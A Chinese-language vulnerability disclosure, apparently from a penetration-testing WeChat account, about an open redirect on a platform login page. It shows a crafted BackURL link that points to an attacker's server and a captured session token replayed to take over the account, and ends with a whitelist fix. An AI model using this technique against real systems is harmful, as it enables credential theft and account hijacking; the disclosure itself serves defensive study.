某信息化平台登录处存在账户劫持漏洞

  • A+
所属分类:安全文章

点击蓝字 ·  关注我们

01

漏洞标题

某信息化平台登录处存在账户劫持漏洞

02

漏洞类型

URL跳转

03

漏洞等级

高危

04

漏洞地址

http://xx.xx.xx.xx:8809/Home/AdminPretty

05

漏洞详情


0x01

某信息化平台登录处存在URL跳转,这里可以利用这个跳转劫持登录用户的账户凭证。
http://xx.xx.xx.xx:8808/Login/xxxIndex?BackURL=http://xx.xx.xx.xx:8809/Home/Admin


某信息化平台登录处存在账户劫持漏洞


0x02

这里搭配自己的服务器,完成劫持过程:

首先变化下登录链接,将跳转后的地址换成自己的服务器地址:

http://xx.xx.xx.xx:8808/Login/xxxIndex?BackURL=http://xx.xx.xx.xx:2333/


某信息化平台登录处存在账户劫持漏洞


0x03

将上面链接发送给用户,只要用户正常登录,服务器这边就能收到用户的登录凭证:

/?Token=8B0D78A4D3087010D1AAFA060CD420C44C2D283E53A0B430016631DD6B2B4DE1317D9935FA9F602B,test01


然后加上原来的地址,直接可以登录系统.


某信息化平台登录处存在账户劫持漏洞

06

漏洞危害

  1. 用户点击上面发送的ip链接就可以导致账户被攻击者登录
  2. 利用任意的URL跳转的问题可以跳转到其他网站

07

建议措施

限制登录后的URL跳转范围,定义白名单.


PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负


EDI安全

某信息化平台登录处存在账户劫持漏洞

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


本文始发于微信公众号(EDI安全):某信息化平台登录处存在账户劫持漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: